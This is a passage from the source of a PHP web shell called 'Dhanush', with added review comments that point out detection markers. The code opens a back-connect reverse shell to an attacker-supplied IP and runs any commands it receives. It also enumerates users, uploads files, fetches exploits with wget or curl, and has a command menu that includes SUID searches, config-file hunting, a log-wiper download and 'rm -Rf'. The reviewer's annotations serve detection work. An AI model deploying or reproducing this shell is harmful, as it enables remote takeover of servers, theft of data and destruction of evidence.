6006 $port=$_POST['port'];
6007 $sockfd=fsockopen($ip , $port , $errno, $errstr );
6008 if($errno != 0)
6009 {
6010 $bdmessage = "<font color='red'><b>$errno</b> : $errstr</font>";
6011 }
6012 else if (!$sockfd)
6013 {
6014 $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
6015 }
6016 else
6017 {
6018 fputs ($sockfd ,"\n=================================================================\nCoded By Arjun\n=================================================================");
6019 $pwd = exec_all("pwd");
6020 $sysinfo = exec_all("uname -a");
6021 $id = exec_all("id");
6022 $len = 1337;
6023 fputs($sockfd ,$sysinfo . "\n" );
6024 fputs($sockfd ,$pwd . "\n" );
6025 fputs($sockfd ,$id ."\n\n" );
6026 fputs($sockfd ,$dateAndTime."\n\n" );
6027 while(!feof($sockfd))
6028 {
6029 $cmdPrompt ="(dhanush)[$]> ";
6030 fputs ($sockfd , $cmdPrompt );
6031 $command= fgets($sockfd, $len);
6032 fputs($sockfd , "\n" . exec_all($command) . "\n\n");
6033 }
6034 fclose($sockfd);
6035 }
6036 }
6037 }
6038}
6039else if (isset ($_GET['val1'], $_GET['val2']) && is_numeric($_GET['val1']) && is_numeric($_GET['val2']))
6040{
6041 $temp = "";
6042 for(;$_GET['val1'] <= $_GET['val2'];$_GET['val1']++)
6043 {
6044 $uid = @posix_getpwuid($_GET['val1']);
6045 if ($uid)
6046 $temp .= join(':',$uid)."\n";
6047 }
6048 echo '<br/>';
6049 paramexe('Users', $temp);
6050}
6051else if(isset($_GET['download']))
6052{
6053 download();
6054}
6055else
6056{
6057 ?><script type="text/javascript">gethome('home','<?php echo addslashes($dir); ?>');</script><?php
6058}
6059$is_writable = is_writable($dir)?"<font class=txt>< writable ></font>":"< not writable >";
6060?>
6061</p><center><div id="showdir"><?php echo $bdmessage; ?></div></center>
6062<table style="width:100%;border-color:#333333;" border="1">
6063<tr>
6064<td align="center">
6065<form method="post" enctype="multipart/form-data">
6066Upload file : <br><input type="file" name="uploadfile" class="box" size="50">
6067<input type="hidden" id=path name="path" value="<?php echo $dir; ?>" />
6068<input type=submit value="Upload" name="u" value="u" class="but" ></form>
6069<span name="wrtble"><?php
6070echo $is_writable; ?></span>
6071 <br>
6072</td>
6073<td align="center" style="height:105px;">Create File :
6074<form onSubmit="createdir('Create',createfile.value);return false;">
6075<input type="text" class="box" value="<?php echo $dir . $directorysperator; ?>" name="createfile" id="createfile">
6076<input type="button" onClick="createdir('Create',createfile.value)" value="Create" class="but">
6077</form><span name="wrtble">
6078<?php echo $is_writable; ?></span>
6079</td>
6080</tr>
6081<tr>
6082<td align="center" style="height:105px;">Execute : <form onSubmit="executemyfile('execute','<?php echo addslashes($dir); ?>',execute.value);return false;">
6083<input type="text" class="box" name="execute">
6084<input type="hidden" id="exepath" name="exepath" value="<?php echo $dir; ?>">
6085 <input type="button" onClick="executemyfile('execute',exepath.value,execute.value)" value="Execute" class="but"></form></td>
6086
6087<td align="center">Create Directory : <form onSubmit="createdir('createfolder',createfolder.value);return false;">
6088<input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="createfolder" id="createfolder">
6089<input type="button" onClick="createdir('createfolder',createfolder.value)" value="Create" class="but">
6090</form><span name="wrtble"><?php
6091echo $is_writable;
6092?></span></td></tr>
6093<tr><td style="height:105px;" align="center">Get Exploit <form onSubmit="getexploit(wurl.value,path.value,functiontype.value);return false;">
6094<input type="text" name="wurl" class="box" value="http://www.some-code/exploits.c">
6095<input type="button" onClick="getexploit(wurl.value,uppath.value,functiontype.value)" value=" G0 " class="but"><br><br>
6096<input type="hidden" id="uppath" name="uppath" value="<?php echo $dir . $directorysperator; ?>">
6097<select name="functiontype" class="sbox">
6098<option value="wwget">wget</option>
6099<option value="wlynx">lynx</option>
6100<option value="wfread">fread</option>
6101<option value="wfetch">fetch</option>
6102<option value="wlinks">links</option>
6103<option value="wget">GET</option>
6104<option value="wcurl">curl</option>
6105</select>
6106</form><div id="showexp"></div>
6107</td>
6108<td align="center">
6109<form>
6110Some Commands<br>
6111<?php if($os != "Windows")
6112{ ?>
6113<SELECT NAME="mycmd" class="box">
6114 <OPTION VALUE="uname -a">Kernel version
6115 <OPTION VALUE="w">Logged in users
6116 <OPTION VALUE="lastlog">Last to connect
6117 <option value='cat /etc/hosts'>IP Addresses
6118 <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP
6119 <OPTION VALUE="logeraser">Log Eraser
6120 <OPTION VALUE="find / -perm -2 -ls">Find all writable directories
6121 <OPTION VALUE="find . -perm -2 -ls">Find all writable directories in Current Folder
6122 <OPTION VALUE="find / -type f -name \"config*\"">find config* files
6123 <OPTION VALUE="find . -type f -name \"config*\"">find config* files in current dir
6124 <OPTION VALUE="find . -type f -perm -04000 -ls">find suid files in current dir
6125 <OPTION VALUE="find / -type f -perm -04000 -ls">find all suid files
6126 <OPTION VALUE="find / -user root -perm -022">find all sgid files
6127 <OPTION VALUE="find . -type f -perm -02000 -ls">find suid files in current dir
6128 <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
6129 <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
6130 <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
6131 <?php if(is_dir('/etc/valiases')){ ?><option value="ls -l /etc/valiases">List of Cpanel`s domains(valiases)</option><?php } ?>
6132 <?php if(is_dir('/etc/vdomainaliases')) { ?><option value=\"ls -l /etc/vdomainaliases">List Cpanel`s domains(vdomainaliases)</option><?php } ?>
6133 <OPTION VALUE="which wget curl w3m lynx">Downloaders?
6134 <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
6135 <OPTION VALUE="ps aux">Show running proccess
6136 <OPTION VALUE="uptime">Uptime check
6137 <OPTION VALUE="cat /proc/meminfo">Memory check
6138 <OPTION VALUE="netstat -an | grep -i listen">Open ports
6139 <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
6140 <OPTION VALUE="wget www.ussrback.com/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)
6141 <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
6142 <OPTION VALUE="./zap2">WIPELOGS PT3
6143 <OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
6144 </SELECT>
6145 <?php } else {?>
6146 <SELECT NAME="mycmd" class="box">
6147 <OPTION VALUE="dir /s /w /b *config*.php">Find *config*.php in current directory
6148 <OPTION VALUE="dir /s /w /b index.php">Find index.php in current dir
6149 <OPTION VALUE="systeminfo">System Informations
6150 <OPTION VALUE="net user">User accounts
6151 <OPTION VALUE="netstat -an">Open ports
6152 <OPTION VALUE="getmac">Get Mac Address
6153 <OPTION VALUE="net start">Show running services
6154 <OPTION VALUE="net view">Show computers
6155 <OPTION VALUE="arp -a">ARP Table
6156 <OPTION VALUE="tasklist">Show Process
6157 <OPTION VALUE="ipconfig/all">IP Configuration
6158
6159 </SELECT>
6160 <?php } ?>
6161 <input type="hidden" id="auexepath" name="auexepath" value="<?php echo $dir; ?>">
6162<input type="button" onClick="executemyfile('mycmd',auexepath.value,mycmd.value)" value="Execute" class="but">
6163</form>
6164</td>
6165</tr></table><br>
6166
6167</td>
6168</tr>
6169</table>
6170
6171<?php
6172
6173
6174// logout: runs on any request that carries a `logout` query parameter.
6175
// NOTE(review): setcookie()'s second argument is the cookie VALUE, so this call does not
// expire "hacked"; it overwrites it with a Unix timestamp (now minus one hour) as the value.
// The session ends only because that value no longer equals md5($pass) at the cookie check
// further down the file. For log review: a "hacked" cookie holding a decimal timestamp
// instead of a 32-character hex digest is the trace this logout leaves.
6176if(isset($_GET['logout']))
6177{
6178 setcookie("hacked",time() - 60*60);
// $self is assigned outside this section; presumably $_SERVER["PHP_SELF"] — confirm.
6179 header("Location:$self");
// Flushes an output buffer; the file opens one with ob_start() near the top.
6180 ob_end_flush();
6181}
6182?>
6183
6184
6185<hr color="#1B1B1B">
6186<div align="center">
6187<font size="6" face="Times New Roman, Times, serif" color="#00CC00">धनुष<br>
6188--==Coded By Arjun==--</font><br><a href="http://www.google.com/search?q=%E0%A4%9C%E0%A4%AF%20%E0%A4%B9%E0%A4%BF%E0%A4%A8%E0%A5%8D%E0%A4%A6" target="_blank"><font color="#FF0000" size="6">जय हिन्द</font></a></div>
6189<?php
6190}
6191}
6192
// Login handler for the form rendered by the cookie check below.
// The POSTed uname/passwd are compared with == against $user/$pass, which are hard-coded
// in plain text at the top of the file.
6193if(isset($_POST['uname']) && isset($_POST['passwd']))
6194{
6195 if( $_POST['uname'] == $user && $_POST['passwd'] == $pass )
6196 {
// The "session" is only a cookie named "hacked" whose value is md5($pass): the same value
// for every login, sent with no expiry argument and no Secure/HttpOnly options.
// For detection: a request cookie hacked=<32 hex characters> sent to a PHP file is a usable
// indicator in proxy/WAF logs — NOTE(review): requires that cookies are logged.
6197 setcookie("hacked", md5($pass));
6198 $selfenter = $_SERVER["PHP_SELF"];
// Redirects back to this script; no exit follows, so the rest of the file still runs on this request.
6199 header("Location:$selfenter");
6200 }
6201}
6202
// Access gate: every request without a "hacked" cookie equal to md5($pass) gets the login
// form below. The comparison is a loose != against a static digest of the hard-coded password.
// Static strings in this form ("Dhanush", "--==Coded By Arjun==--", the uname/passwd field
// names, the noscript text) are stable content markers for file or HTTP-response signatures.
// Requests whose User-Agent matches the crawler list at the top of the file receive a 404
// and exit before reaching this point, so a scan sent with such a User-Agent will not see this form.
6203if((!isset($_COOKIE['hacked']) || $_COOKIE['hacked']!=md5($pass)) )
6204{
// shellstyle() is defined outside this section; presumably emits the page head and CSS — confirm.
6205 shellstyle();
6206?>
6207 <center>
6208 <form method="POST">
6209 <div style="background-color:#171717; width:50%; border-radius:7px; margin-top:150px; -moz-border-radius:25px; height:410px; background-image:url(Windows_7_-_Alien_from_outer_space.jpg);">
6210 <table cellpadding="9" cellspacing="4">
6211 <tr>
6212 <td align="center" colspan="2"><blink><font size="7"><b>Dhanush</b></font></blink></td>
6213 </tr>
6214 <tr>
6215 <td align="right"><b>User Name : </b></td>
6216 <td><input type="text" name="uname" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
6217 </tr>
6218 <tr>
6219 <td align="right"><b>Password : </b></td>
6220 <td><input type="password" name="passwd" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
6221 </tr>
6222 <tr>
6223 <td align="center" colspan="2"><input type="submit" class="but" value=" Enter "></td>
6224 </tr>
6225 <tr>
6226 <td align="center" colspan="2"><font size="6" face="Times New Roman, Times, serif"><b>--==Coded By Arjun==--</b></font></td>
6227 </tr>
6228 <tr>
6229 <td colspan="2"><font size="4" face="Times New Roman, Times, serif"><noscript>Enable Javascript in your browser for the proper working of the shell</noscript></font></td>
6230 </tr>
6231 </table>
6232 </div>
6233
6234 </form>
6235 </center>
6236<br>
6237</body>
6238</html>
6239<?php
6240}
6241?>